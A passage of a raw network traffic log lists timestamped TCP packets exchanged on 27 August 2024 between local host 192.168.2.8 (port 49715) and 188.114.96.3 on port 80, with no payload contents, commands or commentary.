                                Aug 27, 2024 09:49:36.767894030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.767906904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.767934084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.767934084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.768940926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769005060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769011974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.769018888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769049883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.769066095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769078016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769089937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769107103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769112110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.769119978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769167900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769184113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769192934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.769218922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.769244909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769257069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769263029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769279957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.769294977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.769309044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770087957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770136118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770153999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770159006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770184040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770193100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770200014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770231009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770242929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770256996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770268917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770282030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770303011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770314932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770344019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770356894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770382881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770389080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770394087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770426035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770447969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770802975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770817041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770831108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770844936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770927906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770940065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770946026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.770952940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770963907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.770978928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.771020889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.854918957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.854945898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.854957104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855014086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855025053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855036020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855050087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855063915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855101109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855103970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855194092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855209112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855221033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855232000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855243921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855254889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855261087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855268955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855282068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855313063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855393887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855406046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855417013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855428934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855439901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855458975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855495930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855539083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855551958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855570078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855580091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855581045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855592966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855603933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855616093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855618000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855628967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855640888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855648041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855668068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855678082 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855874062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855885983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855891943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855896950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855910063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855921030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855931044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.855940104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.855963945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.856005907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856045961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.856054068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856065035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856112957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.856169939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856180906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856192112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856204987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856216908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.856281042 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.856306076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856317997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856328964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856340885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856353045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856364965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856375933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.856408119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.856442928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857099056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857141972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857153893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857156992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857192993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857254982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857266903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857290030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857302904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857315063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857352018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857374907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857387066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857398987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857428074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857446909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857541084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857553959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857564926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857578039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857584953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857590914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857603073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857614994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857628107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857664108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857693911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857696056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857714891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857736111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857814074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857825994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857839108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857856989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857882023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.857968092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857980013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.857990980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858002901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858016014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858027935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858038902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858093977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858099937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858129978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858129978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858226061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858237982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858249903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858263016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858273029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858279943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858294010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858305931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858305931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858318090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858330011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858334064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858356953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858539104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858550072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858561039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858575106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858586073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858597040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858608007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858616114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858618975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858630896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858638048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858643055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858653069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858671904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858834982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858851910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858863115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858880997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858880997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858892918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858892918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858910084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858922005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858932018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858939886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858943939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858956099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.858957052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.858985901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.914249897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.944766998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944783926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944797039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944858074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.944933891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944951057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944962978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944976091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944977999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.944988012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.944999933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945007086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945019007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945028067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945029974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945041895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945053101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945055962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945065022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945080042 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945081949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945095062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945101976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945107937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945121050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945136070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945138931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945152044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945163965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945173979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945187092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945197105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945209980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945244074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945255995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945266962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945278883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945290089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945302963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945322990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945353031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945497990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945542097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945580959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945594072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945626020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945719004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945730925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945744038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945766926 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945770025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945782900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945794106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945807934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945818901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945838928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945899010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945909977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945920944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945931911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945949078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945950031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945957899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945962906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945975065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.945983887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.945991993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.946024895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.946131945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.946249962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947137117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947186947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947197914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947284937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947292089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947303057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947314024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947326899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947329044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947340012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947351933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947355032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947362900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947379112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947380066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947391987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947403908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947412014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947416067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947427034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947438955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947453976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947493076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947504044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947530985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947597027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947607994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947634935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947668076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947680950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947710037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947727919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947741032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947751045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947770119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947782040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947792053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947810888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947823048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.947849035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.947999954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948012114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948023081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948035955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948048115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948052883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948060036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948074102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948132038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948153973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948164940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948177099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948188066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948189020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948201895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948210955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948214054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948235035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.948277950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948296070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948311090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.948323011 CEST4971580192.168.2.8188.114.96.3
